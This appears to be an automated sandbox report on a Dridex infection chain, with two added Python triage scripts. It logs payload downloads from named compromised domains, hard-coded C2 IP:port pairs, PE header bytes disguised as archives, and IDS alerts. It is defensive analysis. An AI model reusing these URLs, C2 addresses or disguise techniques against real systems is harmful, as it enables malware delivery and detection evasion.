Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49301
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49304
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49305
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49309
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49310
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49314
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49314
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49311
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 69.164.207.140:3388
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 198.57.200.100:3786
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:13:16 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 12 Jan 2021 11:40:23 GMTAccept-Ranges: bytesContent-Length: 765440Keep-Alive: timeout=5, max=75Content-Type: application/x-rar-compressed
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:13:25 GMTServer: ApacheLast-Modified: Mon, 11 Jan 2021 21:14:58 GMTAccept-Ranges: bytesContent-Length: 765440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:14:27 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubdomains;X-Frame-Options: SAMEORIGINLast-Modified: Thu, 14 Jan 2021 04:03:15 GMTAccept-Ranges: bytesContent-Length: 765440Cache-Control: max-age=2592000Expires: Fri, 19 Feb 2021 15:14:27 GMTKeep-Alive: timeout=5, max=50Connection: Keep-AliveContent-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
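All three 200 responses above declare an archive (application/x-rar-compressed, application/zip) for the .rar/.zip names that were requested, yet every body starts with 4d 5a ("MZ") and the DOS stub text "This program cannot be run in DOS mode", and all three are exactly 765440 bytes: the archive extension is a disguise for one PE image. The following is an added example, not code from the report or from the sample, that performs the check a triage script would run on such a download: compare the declared Content-Type with the body's magic bytes, then decode the COFF header to learn what was fetched. The first 0x130 bytes of the body are transcribed from the report's "Data Raw" field; the magic-byte table and the field names are this example's own assumptions.

```python
"""Declared Content-Type vs. magic-byte check, plus a minimal PE header decode.

Added example, not part of the Joe Sandbox report or the sample's own code.
"""
import struct
from datetime import datetime, timezone
from typing import Optional

# First 0x130 bytes of the 765440-byte response body, transcribed from the
# report's "Data Raw" field. The remainder of the file is not reproduced.
BODY_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72
a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72
78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72
78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72
75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72
78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72
78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72
00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00
15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21
0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00
98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10
"""
BODY = bytes.fromhex(BODY_HEX)

# Headers as logged for the first of the three responses.
RESPONSE_HEADERS = {
    "Content-Type": "application/x-rar-compressed",
    "Content-Length": "765440",
}

# Assumed magic-byte table: only the formats relevant to this report.
MAGIC = {
    b"MZ": "application/vnd.microsoft.portable-executable",
    b"Rar!\x1a\x07": "application/x-rar-compressed",
    b"PK\x03\x04": "application/zip",
}

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000
PE32_MAGIC = 0x10B


def sniff(body: bytes) -> Optional[str]:
    """Return the MIME type implied by the leading bytes, or None if unknown."""
    for magic, mime in MAGIC.items():
        if body.startswith(magic):
            return mime
    return None


def content_type_mismatch(headers: dict, body: bytes) -> bool:
    """True when the body's magic bytes contradict the declared Content-Type."""
    declared = headers.get("Content-Type", "").split(";")[0].strip().lower()
    actual = sniff(body)
    return actual is not None and actual != declared


def parse_pe_header(body: bytes) -> dict:
    """Decode the DOS, COFF and PE32 optional-header fields needed for triage."""
    if body[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)          # offset of 'PE\0\0'
    if body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, stamp, _symptr, _nsyms, _optsize, chars = struct.unpack_from("<HHIIIHH", body, coff)
    opt = coff + 20                                              # optional header start
    (opt_magic,) = struct.unpack_from("<H", body, opt)
    if opt_magic != PE32_MAGIC:
        raise ValueError("only PE32 handled in this example")
    (entry,) = struct.unpack_from("<I", body, opt + 16)          # AddressOfEntryPoint
    (image_base,) = struct.unpack_from("<I", body, opt + 28)     # ImageBase (PE32)
    return {
        "machine": machine,
        "sections": nsect,
        "compile_time": datetime.fromtimestamp(stamp, tz=timezone.utc),
        "is_executable_image": bool(chars & IMAGE_FILE_EXECUTABLE_IMAGE),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "entry_point": entry,
        "image_base": image_base,
    }


def describe_download(headers: dict, body: bytes) -> dict:
    """Combine the mismatch verdict with the PE facts for a one-shot triage record."""
    result = {"declared": headers.get("Content-Type"), "sniffed": sniff(body),
              "mismatch": content_type_mismatch(headers, body)}
    if result["sniffed"] == MAGIC[b"MZ"]:
        result["pe"] = parse_pe_header(body)
    return result


if __name__ == "__main__":
    for key, value in describe_download(RESPONSE_HEADERS, BODY).items():
        print(f"{key}: {value}")
```

For this body the decode gives Machine 0x14c (i386), five sections, Characteristics 0x2102 (executable image, 32-bit, DLL) and ImageBase 0x10000000, which is consistent with the file being loaded through regsvr32.exe as the later evidence in this report shows. Bear in mind that Content-Type and file extension are attacker-controlled; the only trustworthy classifier is the bytes themselves.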
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.57.200.100 198.57.200.100
Source: Joe Sandbox View IP Address: 69.164.207.140 69.164.207.140
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /h79fwesfe.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: monitrade.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ys95lm6k.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bafnabrotherskesarwala.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xkpffwn.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: artec.com.trConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ylztwx.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.gastronauts.asiaConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uzssv27.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /by9zwa7p1.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cms.ivpr.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d8ms3mljy.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salaodigitalautomovel.pt.deve.ptConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49191 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49192 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49199 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49204 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49209 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49212 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49216 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49225 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49232 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49238 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49241 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49244 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49246 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49249 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49256 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49257 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49260 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49271 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49279 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49283 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49293 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49286 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49305 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49309 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214 (27 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140 (16 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.200.100 (7 connections, interleaved with the 69.164.207.140 connections)
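Connections to 194.225.58.214, 69.164.207.140 and 198.57.200.100 appear with no preceding DNS query because the loader carries its servers as literal https://IP:port URLs (the strings https://69.164.207.140:3388/ and https://198.57.200.100:3786/ recovered from regsvr32.exe memory later in this report). The following is an added example, not part of the report, of the detection logic behind that signature: correlate a DNS answer log with a connection log, flag flows to non-local destinations that no earlier DNS answer resolved to, and mark non-standard ports. The log lines are constructed for the example; the destination IPs and the ports 3388 and 3786 are the ones in the report, while the two DNS answers use RFC 5737 documentation addresses because the report does not show what monitrade.net and bafnabrotherskesarwala.com resolved to.

```python
"""Flag outbound connections that were not preceded by a DNS answer.

Added example, not part of the Joe Sandbox report. Sample logs are constructed.
"""
import ipaddress
from collections import Counter
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Constructed DNS answer log: "<timestamp> <qname> <answer_ip>" per line.
DNS_LOG = """\
2021-01-20T15:13:15Z monitrade.net 203.0.113.10
2021-01-20T15:13:24Z bafnabrotherskesarwala.com 203.0.113.20
"""

# Constructed flow log: "<timestamp> <src> <dst> <dport>" per line. The sandbox
# host 192.168.2.22 and the three C2 addresses are taken from the report.
FLOW_LOG = """\
2021-01-20T15:13:16Z 192.168.2.22 203.0.113.10 80
2021-01-20T15:13:25Z 192.168.2.22 203.0.113.20 80
2021-01-20T15:14:40Z 192.168.2.22 194.225.58.214 443
2021-01-20T15:14:41Z 192.168.2.22 69.164.207.140 3388
2021-01-20T15:14:42Z 192.168.2.22 198.57.200.100 3786
2021-01-20T15:14:43Z 192.168.2.22 192.168.2.1 53
2021-01-20T15:14:44Z 192.168.2.22 194.225.58.214 443
2021-01-20T15:14:45Z 192.168.2.22 69.164.207.140 443
"""

# Destinations never expected to come from a DNS answer (RFC 1918, loopback).
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# Ports where an outbound web connection is unremarkable; anything else is noted.
STANDARD_WEB_PORTS = {80, 443}


def _ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_dns(text: str) -> List[Tuple[datetime, str, str]]:
    """Return (answer_time, qname, answer_ip) tuples."""
    out = []
    for line in text.splitlines():
        if line.strip():
            ts, qname, ip = line.split()
            out.append((_ts(ts), qname, ip))
    return out


def parse_flows(text: str) -> List[Tuple[datetime, str, str, int]]:
    """Return (time, src, dst, dport) tuples."""
    out = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            out.append((_ts(ts), src, dst, int(dport)))
    return out


def is_local(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def find_dnsless_connections(dns_text: str, flow_text: str) -> List[Dict]:
    """Flows to non-local IPs that no DNS answer at or before the flow time resolved to."""
    answers = parse_dns(dns_text)
    findings = []
    for ts, src, dst, dport in parse_flows(flow_text):
        if is_local(dst):
            continue
        resolved_names = [q for (ats, q, ip) in answers if ip == dst and ats <= ts]
        if resolved_names:
            continue
        findings.append({
            "ts": ts.isoformat(), "src": src, "dst": dst, "dport": dport,
            "nonstandard_port": dport not in STANDARD_WEB_PORTS,
        })
    return findings


def summarize(findings: List[Dict]) -> Dict[str, int]:
    """Connection count per DNS-less destination, the shape the report lists them in."""
    return dict(Counter(f["dst"] for f in findings))


if __name__ == "__main__":
    hits = find_dnsless_connections(DNS_LOG, FLOW_LOG)
    for hit in hits:
        flag = " (non-standard port)" if hit["nonstandard_port"] else ""
        print(f'{hit["ts"]} {hit["src"]} -> {hit["dst"]}:{hit["dport"]}{flag}')
    print(summarize(hits))
```

On a real network this rule needs the full resolver picture: a warm DNS cache, a resolver outside the capture point, or DNS over HTTPS will all produce flows with no visible query. The hardcoded IP:port strings in the loader are what turn this from a weak signal into a confirmed one here, and the non-standard ports 3388 and 3786 are worth a separate alert on their own.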
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A618C6.emf Jump to behavior
Source: regsvr32.exe, 00000006.00000002.2400051881.0000000000405000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2400051881.0000000000405000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: monitrade.net
